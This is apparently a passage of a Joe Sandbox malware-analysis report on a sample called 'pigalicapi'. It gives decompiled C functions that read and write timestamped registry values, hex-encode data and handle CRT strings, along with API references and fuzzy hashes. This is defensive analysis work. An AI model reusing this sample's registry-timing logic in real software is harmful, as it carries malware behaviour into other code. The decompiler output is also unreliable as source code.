                                                                                                                                                                                                                                                                            					_v16 = 0x80000001;
                                                                                                                                                                                                                                                                            					if(( *0x118435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_v16 = 0x80000002;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v20 = 0;
                                                                                                                                                                                                                                                                            					if(RegOpenKeyExA(_v16, _v12, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                                            						_v48 = 0x10;
                                                                                                                                                                                                                                                                            						_v44 = 0x10;
                                                                                                                                                                                                                                                                            						if(RegQueryValueExA(_v20,  &_v40, 0, 0,  &_v64,  &_v44) == 0 && _v44 == 0x10) {
                                                                                                                                                                                                                                                                            							_v72 =  &_v64;
                                                                                                                                                                                                                                                                            							GetLocalTime( &_v88);
                                                                                                                                                                                                                                                                            							_t91 = _v72;
                                                                                                                                                                                                                                                                            							_t101 = _t100 - 0x10;
                                                                                                                                                                                                                                                                            							_t68 = _t101;
                                                                                                                                                                                                                                                                            							 *_t68 =  *_t91;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t91 + 4));
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t68 + 8)) =  *((intOrPtr*)(_t91 + 8));
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t68 + 0xc)) =  *((intOrPtr*)(_t91 + 0xc));
                                                                                                                                                                                                                                                                            							_t69 = _t101 - 0x10;
                                                                                                                                                                                                                                                                            							 *_t69 = _v88.wYear;
                                                                                                                                                                                                                                                                            							_t69[2] = _v88.wDayOfWeek;
                                                                                                                                                                                                                                                                            							_t69[4] = _v88.wHour;
                                                                                                                                                                                                                                                                            							_t69[6] = _v88.wSecond;
                                                                                                                                                                                                                                                                            							_t70 = E01179910();
                                                                                                                                                                                                                                                                            							asm("cdq");
                                                                                                                                                                                                                                                                            							_v68 = _t70 / 0x3c;
                                                                                                                                                                                                                                                                            							if(_v68 <  *((intOrPtr*)(_a4 + 0x10))) {
                                                                                                                                                                                                                                                                            								_v5 = 0;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						RegCloseKey(_v20);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                                                            0x01177256
                                                                                                                                                                                                                                                                            0x0117725e
                                                                                                                                                                                                                                                                            0x011773af
                                                                                                                                                                                                                                                                            0x011773b5
                                                                                                                                                                                                                                                                            0x01177285
                                                                                                                                                                                                                                                                            0x01177295
                                                                                                                                                                                                                                                                            0x01177298
                                                                                                                                                                                                                                                                            0x0117729d
                                                                                                                                                                                                                                                                            0x011772a8
                                                                                                                                                                                                                                                                            0x011772bd
                                                                                                                                                                                                                                                                            0x011772c3
                                                                                                                                                                                                                                                                            0x011772c6
                                                                                                                                                                                                                                                                            0x011772d6
                                                                                                                                                                                                                                                                            0x011772d8
                                                                                                                                                                                                                                                                            0x011772d8
                                                                                                                                                                                                                                                                            0x011772df
                                                                                                                                                                                                                                                                            0x01177301
                                                                                                                                                                                                                                                                            0x01177307
                                                                                                                                                                                                                                                                            0x0117730e
                                                                                                                                                                                                                                                                            0x01177331
                                                                                                                                                                                                                                                                            0x0117733c
                                                                                                                                                                                                                                                                            0x01177343
                                                                                                                                                                                                                                                                            0x01177349
                                                                                                                                                                                                                                                                            0x0117734c
                                                                                                                                                                                                                                                                            0x0117734f
                                                                                                                                                                                                                                                                            0x01177353
                                                                                                                                                                                                                                                                            0x01177358
                                                                                                                                                                                                                                                                            0x0117735e
                                                                                                                                                                                                                                                                            0x01177364
                                                                                                                                                                                                                                                                            0x0117736a
                                                                                                                                                                                                                                                                            0x0117736f
                                                                                                                                                                                                                                                                            0x01177374
                                                                                                                                                                                                                                                                            0x0117737a
                                                                                                                                                                                                                                                                            0x01177380
                                                                                                                                                                                                                                                                            0x01177383
                                                                                                                                                                                                                                                                            0x0117738b
                                                                                                                                                                                                                                                                            0x01177393
                                                                                                                                                                                                                                                                            0x0117739f
                                                                                                                                                                                                                                                                            0x011773a1
                                                                                                                                                                                                                                                                            0x011773a1
                                                                                                                                                                                                                                                                            0x0117739f
                                                                                                                                                                                                                                                                            0x011773a9
                                                                                                                                                                                                                                                                            0x011773a9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01177301

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 011772BD
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 011772F9
                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 01177329
                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 01177343
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 011773A9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseLocalOpenQueryTimeValuewsprintf
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3852505512-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2034279153b46b7eb4a6661255fdf49622cb1eef7760d884e6a37e71f25d69d2
                                                                                                                                                                                                                                                                            • Instruction ID: 6d54a2ab0e0f342baf1d13d6405c9597ca27759fbeb3a134bcf43cb86f06999e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2034279153b46b7eb4a6661255fdf49622cb1eef7760d884e6a37e71f25d69d2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4417BB4E04209EFDB18DF98C889BEEBBB5BF48300F04855DE915AB381D7759A44CB90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                                                            			E00C7A71E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                                                            				void* _v40;
                                                                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                                                            				int _t46;
                                                                                                                                                                                                                                                                            				int _t53;
                                                                                                                                                                                                                                                                            				void* _t55;
                                                                                                                                                                                                                                                                            				int _t57;
                                                                                                                                                                                                                                                                            				signed int _t63;
                                                                                                                                                                                                                                                                            				int _t67;
                                                                                                                                                                                                                                                                            				short* _t69;
                                                                                                                                                                                                                                                                            				signed int _t70;
                                                                                                                                                                                                                                                                            				short* _t71;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t34 =  *0xd0db44; // 0xce6c4b51
                                                                                                                                                                                                                                                                            				_v8 = _t34 ^ _t70;
                                                                                                                                                                                                                                                                            				E00C76093(__ebx,  &_v28, __edx, _a4);
                                                                                                                                                                                                                                                                            				_t57 = _a24;
                                                                                                                                                                                                                                                                            				if(_t57 == 0) {
                                                                                                                                                                                                                                                                            					_t53 =  *(_v24 + 8);
                                                                                                                                                                                                                                                                            					_t57 = _t53;
                                                                                                                                                                                                                                                                            					_a24 = _t53;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t67 = 0;
                                                                                                                                                                                                                                                                            				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                                                                                                                                                                            				_v12 = _t40;
                                                                                                                                                                                                                                                                            				if(_t40 == 0) {
                                                                                                                                                                                                                                                                            					L15:
                                                                                                                                                                                                                                                                            					if(_v16 != 0) {
                                                                                                                                                                                                                                                                            						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return E00C7DE3E(_v8 ^ _t70);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t55 = _t40 + _t40;
                                                                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            				if((_t55 + 0x00000008 & _t40) == 0) {
                                                                                                                                                                                                                                                                            					_t69 = 0;
                                                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                                                            					if(_t69 != 0) {
                                                                                                                                                                                                                                                                            						E00C7F290(_t67, _t69, _t67, _t55);
                                                                                                                                                                                                                                                                            						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                                                                                                                                                                                                                                                            						if(_t46 != 0) {
                                                                                                                                                                                                                                                                            							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                                                            					E00C7A83B(_t69);
                                                                                                                                                                                                                                                                            					goto L15;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            				_t48 = _t40 & _t55 + 0x00000008;
                                                                                                                                                                                                                                                                            				_t63 = _t55 + 8;
                                                                                                                                                                                                                                                                            				if((_t40 & _t55 + 0x00000008) > 0x400) {
                                                                                                                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            					_t69 = E00C7BF3C(_t63, _t48 & _t63);
                                                                                                                                                                                                                                                                            					if(_t69 == 0) {
                                                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *_t69 = 0xdddd;
                                                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                                                            					_t69 =  &(_t69[4]);
                                                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            				E00C7E490();
                                                                                                                                                                                                                                                                            				_t69 = _t71;
                                                                                                                                                                                                                                                                            				if(_t69 == 0) {
                                                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				 *_t69 = 0xcccc;
                                                                                                                                                                                                                                                                            				goto L9;
                                                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                                                            0x00c7a726
                                                                                                                                                                                                                                                                            0x00c7a72d
                                                                                                                                                                                                                                                                            0x00c7a739
                                                                                                                                                                                                                                                                            0x00c7a73e
                                                                                                                                                                                                                                                                            0x00c7a743
                                                                                                                                                                                                                                                                            0x00c7a748
                                                                                                                                                                                                                                                                            0x00c7a74b
                                                                                                                                                                                                                                                                            0x00c7a74d
                                                                                                                                                                                                                                                                            0x00c7a74d
                                                                                                                                                                                                                                                                            0x00c7a752
                                                                                                                                                                                                                                                                            0x00c7a76b
                                                                                                                                                                                                                                                                            0x00c7a771
                                                                                                                                                                                                                                                                            0x00c7a776
                                                                                                                                                                                                                                                                            0x00c7a815
                                                                                                                                                                                                                                                                            0x00c7a819
                                                                                                                                                                                                                                                                            0x00c7a81e
                                                                                                                                                                                                                                                                            0x00c7a81e
                                                                                                                                                                                                                                                                            0x00c7a83a
                                                                                                                                                                                                                                                                            0x00c7a83a
                                                                                                                                                                                                                                                                            0x00c7a77c
                                                                                                                                                                                                                                                                            0x00c7a784
                                                                                                                                                                                                                                                                            0x00c7a788
                                                                                                                                                                                                                                                                            0x00c7a7d4
                                                                                                                                                                                                                                                                            0x00c7a7d6
                                                                                                                                                                                                                                                                            0x00c7a7d8
                                                                                                                                                                                                                                                                            0x00c7a7dd
                                                                                                                                                                                                                                                                            0x00c7a7f4
                                                                                                                                                                                                                                                                            0x00c7a7fc
                                                                                                                                                                                                                                                                            0x00c7a80c
                                                                                                                                                                                                                                                                            0x00c7a80c
                                                                                                                                                                                                                                                                            0x00c7a7fc
                                                                                                                                                                                                                                                                            0x00c7a80e
                                                                                                                                                                                                                                                                            0x00c7a80f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7a814
                                                                                                                                                                                                                                                                            0x00c7a78f
                                                                                                                                                                                                                                                                            0x00c7a791
                                                                                                                                                                                                                                                                            0x00c7a793
                                                                                                                                                                                                                                                                            0x00c7a79b
                                                                                                                                                                                                                                                                            0x00c7a7b8
                                                                                                                                                                                                                                                                            0x00c7a7c2
                                                                                                                                                                                                                                                                            0x00c7a7c7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7a7c9
                                                                                                                                                                                                                                                                            0x00c7a7cf
                                                                                                                                                                                                                                                                            0x00c7a7cf
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7a7cf
                                                                                                                                                                                                                                                                            0x00c7a79f
                                                                                                                                                                                                                                                                            0x00c7a7a3
                                                                                                                                                                                                                                                                            0x00c7a7a8
                                                                                                                                                                                                                                                                            0x00c7a7ac
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7a7ae
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?), ref: 00C7A76B
                                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00C7A7A3
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C7A7F4
                                                                                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C7A806
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C7A80F
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BF3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C7A7C2,00000000), ref: 00C7BF6E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 313313983-0
                                                                                                                                                                                                                                                                            • Opcode ID: 43a8c2a889dcea4271c4480c32b5fe273353d2879f4ceaad66ae4440e0ba59f8
                                                                                                                                                                                                                                                                            • Instruction ID: 7b062a2d2dd22794cb6e20514ee76783b3c2497c2449b3986140d4fcda7df3ef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43a8c2a889dcea4271c4480c32b5fe273353d2879f4ceaad66ae4440e0ba59f8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A731B272A0020AABDB258F65CC45EAF7BB5EF80710F148169FC19D7290E735CD51DB92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E011773C0(long _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                                                                            				char* _t26;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                            					_t24 = _a4;
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t24 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                            						_v20 = E011716F0(_a8, _a12);
                                                                                                                                                                                                                                                                            						_t26 =  *0x11818a0; // 0x1183b88
                                                                                                                                                                                                                                                                            						_v8 = _t26;
                                                                                                                                                                                                                                                                            						E01177D20(_t26,  &_v36, 0, 0x10);
                                                                                                                                                                                                                                                                            						wsprintfA( &_v36, "%u", _v20);
                                                                                                                                                                                                                                                                            						_v12 = 0x80000001;
                                                                                                                                                                                                                                                                            						if(( *0x118435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            							_v12 = 0x80000002;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v16 = 0;
                                                                                                                                                                                                                                                                            						_t24 = RegOpenKeyExA(_v12, _v8, 0, 0xf003f,  &_v16);
                                                                                                                                                                                                                                                                            						if(_t24 == 0) {
                                                                                                                                                                                                                                                                            							GetLocalTime( &_v52);
                                                                                                                                                                                                                                                                            							RegSetValueExA(_v16,  &_v36, 0, 3,  &_v52, 0x10);
                                                                                                                                                                                                                                                                            							return RegCloseKey(_v16);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                                                            0x011773ca
                                                                                                                                                                                                                                                                            0x011773e4
                                                                                                                                                                                                                                                                            0x011773eb
                                                                                                                                                                                                                                                                            0x01177401
                                                                                                                                                                                                                                                                            0x01177404
                                                                                                                                                                                                                                                                            0x01177409
                                                                                                                                                                                                                                                                            0x01177414
                                                                                                                                                                                                                                                                            0x01177429
                                                                                                                                                                                                                                                                            0x01177432
                                                                                                                                                                                                                                                                            0x01177442
                                                                                                                                                                                                                                                                            0x01177444
                                                                                                                                                                                                                                                                            0x01177444
                                                                                                                                                                                                                                                                            0x0117744b
                                                                                                                                                                                                                                                                            0x01177465
                                                                                                                                                                                                                                                                            0x0117746d
                                                                                                                                                                                                                                                                            0x01177473
                                                                                                                                                                                                                                                                            0x0117748b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01177495
                                                                                                                                                                                                                                                                            0x0117746d
                                                                                                                                                                                                                                                                            0x011773eb
                                                                                                                                                                                                                                                                            0x0117749e

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01177429
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 01177465
                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 01177473
                                                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0117748B
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 01177495
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseLocalOpenTimeValuewsprintf
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3926099652-0
                                                                                                                                                                                                                                                                            • Opcode ID: 782e444a56f6a510fb94c855bdbf1e537d2ef8415d2d0a154323247b595cd46a
                                                                                                                                                                                                                                                                            • Instruction ID: 0163b279990e1a9a0cc44ce5b767cc1bc0c91ec03bf2f23c99ae1320d699e07b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 782e444a56f6a510fb94c855bdbf1e537d2ef8415d2d0a154323247b595cd46a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E213D75900209BFEB18DFA4D889FFE7B78BB49700F048568FA119A280D7B49644CFA1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01179650(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                                            				int _v24;
                                                                                                                                                                                                                                                                            				signed char _v25;
                                                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                            					while(_v12 < _a8 && _v24 < _a16) {
                                                                                                                                                                                                                                                                            						_v25 =  *((intOrPtr*)(_a4 + _v12));
                                                                                                                                                                                                                                                                            						E01177D20(_a4 + _v12,  &_v20, 0, 8);
                                                                                                                                                                                                                                                                            						E01179560(_v25 & 0x000000ff,  &_v20, 7);
                                                                                                                                                                                                                                                                            						_t58 = _t58 + 0x18;
                                                                                                                                                                                                                                                                            						lstrcatA(_a12,  &_v20);
                                                                                                                                                                                                                                                                            						_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                            						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(lstrlenA(_a12) > _a16) {
                                                                                                                                                                                                                                                                            						_a12[_a16] = 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v8 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                                            0x01179656
                                                                                                                                                                                                                                                                            0x01179661
                                                                                                                                                                                                                                                                            0x01179685
                                                                                                                                                                                                                                                                            0x01179696
                                                                                                                                                                                                                                                                            0x01179699
                                                                                                                                                                                                                                                                            0x011796b1
                                                                                                                                                                                                                                                                            0x011796bc
                                                                                                                                                                                                                                                                            0x011796cf
                                                                                                                                                                                                                                                                            0x011796d4
                                                                                                                                                                                                                                                                            0x011796df
                                                                                                                                                                                                                                                                            0x011796ef
                                                                                                                                                                                                                                                                            0x011796f8
                                                                                                                                                                                                                                                                            0x011796f8
                                                                                                                                                                                                                                                                            0x0117970a
                                                                                                                                                                                                                                                                            0x01179712
                                                                                                                                                                                                                                                                            0x01179712
                                                                                                                                                                                                                                                                            0x0117971f
                                                                                                                                                                                                                                                                            0x0117971f
                                                                                                                                                                                                                                                                            0x01179728

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 01179690
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,00000000), ref: 011796DF
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 011796E9
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 01179701
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 01179719
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 493641738-0
                                                                                                                                                                                                                                                                            • Opcode ID: 05263e1868896c94de0a23024c49f26dcfa7cf31a91b55ef2a396f3459e80c56
                                                                                                                                                                                                                                                                            • Instruction ID: 84afe69b3494aca6a899517684dfed32d4c9b0f3d5882988539fc209de843d8e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05263e1868896c94de0a23024c49f26dcfa7cf31a91b55ef2a396f3459e80c56
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B213D7490024EEFCB19CF98D884BEE7BB5BF44318F144558E914A7340D374AA98CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                                                            			E00C79ED4(void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				intOrPtr _t2;
                                                                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                                                            				long _t17;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t11 = __ecx;
                                                                                                                                                                                                                                                                            				_t17 = GetLastError();
                                                                                                                                                                                                                                                                            				_t10 = 0;
                                                                                                                                                                                                                                                                            				_t2 =  *0xd0d4dc; // 0x2
                                                                                                                                                                                                                                                                            				_t20 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                                                            				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                                                            					_t16 = E00C7A89E(_t11, 1, 0x364);
                                                                                                                                                                                                                                                                            					_pop(_t13);
                                                                                                                                                                                                                                                                            					if(_t16 != 0) {
                                                                                                                                                                                                                                                                            						_t4 = E00C7AB4E(_t13, _t17, __eflags,  *0xd0d4dc, _t16);
                                                                                                                                                                                                                                                                            						__eflags = _t4;
                                                                                                                                                                                                                                                                            						if(_t4 != 0) {
                                                                                                                                                                                                                                                                            							E00C79CC2(_t13, _t16, 0xd0dd14);
                                                                                                                                                                                                                                                                            							E00C7A8FB(_t10);
                                                                                                                                                                                                                                                                            							__eflags = _t16;
                                                                                                                                                                                                                                                                            							if(_t16 != 0) {
                                                                                                                                                                                                                                                                            								goto L9;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								goto L8;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_push(_t16);
                                                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_push(_t10);
                                                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                                                            						E00C7A8FB();
                                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                                            						SetLastError(_t17);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t16 = E00C7AAF8(_t11, _t17, _t20, _t2);
                                                                                                                                                                                                                                                                            					if(_t16 != 0) {
                                                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                                                            						SetLastError(_t17);
                                                                                                                                                                                                                                                                            						_t10 = _t16;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t10;
                                                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                                                            0x00c79ed4
                                                                                                                                                                                                                                                                            0x00c79edf
                                                                                                                                                                                                                                                                            0x00c79ee1
                                                                                                                                                                                                                                                                            0x00c79ee3
                                                                                                                                                                                                                                                                            0x00c79ee8
